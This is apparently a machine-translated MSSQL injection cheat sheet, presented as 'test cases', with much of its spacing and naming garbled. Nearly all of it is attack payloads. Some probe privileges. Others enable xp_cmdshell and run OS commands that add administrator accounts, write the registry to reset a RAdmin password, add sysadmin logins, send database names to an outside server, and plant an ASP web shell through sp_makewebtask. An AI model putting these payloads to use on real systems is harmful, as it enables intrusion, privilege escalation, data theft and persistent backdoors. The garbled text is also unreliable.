SQL Injection Test Cases

// Check the permissions and 1 = (Select IS_MEMBER ('db _ owner') And char (124) % 2 BCast (IS_MEMBER ('db _ owner ') as varchar (1) % 2 Bchar (124) = 1; -- // check whether you have the permission to read a database and 1 = (Select HAS_DBACCESS ('master ')) and char (124) % 2 BCast (HAS_DBACCESS ('master') as varchar (1) % 2 Bchar (124) = 1 -- numeric type and char (124) % 2 Buser % 2 Bchar (124) = 0 character type 'and char (124) % 2 Buser % 2 Bchar (124) = 0 and ''= 'search type' and char (124) % 2 Buser % 2 Bchar (124) = 0 and '%' = 'user name and user> 0' and user> 0 and '=' Check whether SA permission and 1 = (select IS_SRVROLEMEMBER ('sysadmin ') ); -- And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 -- check whether the MSSQL database and exists (select * from sysobjects); -- check whether multiple rows are supported; declare @ d int; -- Restore xp_mongoshell; exec master .. dbo. sp_addextendedproc 'xp _ external shell', 'xp log70. dll '; -- select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ') // ----------------------- // execute the command // ------------------------- first enable the sandbox mode: exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1 and then use jet. oledb executes the system command select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add")') execute the command; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user paf pafpaf/add '; -- EXEC [master]. [dbo]. [xp_cmdshell] 'COMMAND/c md c: \ 100' to determine whether the stored procedure of xp_cmdshell extension exists: http://192.168.1.5/display.asp?keyno=188 And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ mongoshell') write the Registry exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1 REG_SZ read the Registry exec master .. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit 'reads the directory content exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1 Database Backup backu P database pubs to disk = 'C: \ 123. bak '// burst length And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0; -- sa password change method: after connecting using SQL integrated tools, run the command exec sp_password NULL, 'new password', 'sa 'to add and delete a sa permission user test: exec master. dbo. sp_addlogin test, ptlove exec master. dbo. sp_addsrvrolemember test, sysadmin Delete the xp_stored shell statement: exec sp_dropextendedproc 'xp _ stored shell' add extended stored procedure EXEC [master] .. sp_ad Dextendedproc 'xp _ proxiedadata ', 'c: \ winnt \ system32 \ sqllog. dll' GRANT exec On xp_proxiedadata TO public stop or activate a service. Exec master.. xp_servicecontrol 'stop', 'schedule' exec master... xp_servicecontrol 'start', 'schedule' dbo. xp_subdirs only list subdirectories in a directory. Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp 'dbo. xp_makecab compresses multiple target files into a specific target file. All files to be compressed can be connected to the end of the parameter column and separated by commas. Dbo. xp_makecab 'C: \ test. cab ', 'mszip', 1, 'c: \ Inetpub \ wwwroot \ SQLInject \ login. asp ', 'c: \ Inetpub \ wwwroot \ SQLInject \ securelogin. asp 'xp_terminate_process stops a program in execution, but the parameter assigned is the Process ID. Use "Work administrator" and select pid from "View"> "select field" to check the Process ID xp_terminate_process 2484 xp_unpackcab of each execution program to uncompress the file. Xp_unpackcab 'C: \ test. cab ', 'c: \ temp', 1 forbidden does not exist. There is no way to use regedit/e to import the registration file, but mssql is a sa permission. Run the following command to EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'Port', 'reg _ BINARY ', and 0xd20400 change the port value to 1234 create database lcx; create TABLE ku (name nvarchar (256) null); Create TABLE biao (id int NULL, name nvarchar (256) null ); // obtain the database name insert into opendatasource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; pwd = pafpaf; database = lcx '). lcx. dbo. ku select name from master. dbo. sysdatabases // Create a TABLE in the Master to see how to Create a TABLE master .. d_TEST (id nvarchar (4000) NULL, Data nvarchar (4000) NULL); -- use sp_makewebtask to directly write a sentence in the web directory: http://127.0.0.1/dblogin123.asp?username=123 '; Exec % 20sp_makewebtask % 20 'd: \ www \ tt \ 88. asp ',' % 20 select % 20 ''<% 25 execute (request (" a ") % 25>'' % 20 '; -- // Update table content Update films SET kind = 'dramatic 'Where id = 123 // delete content from table_name where Stockid = 3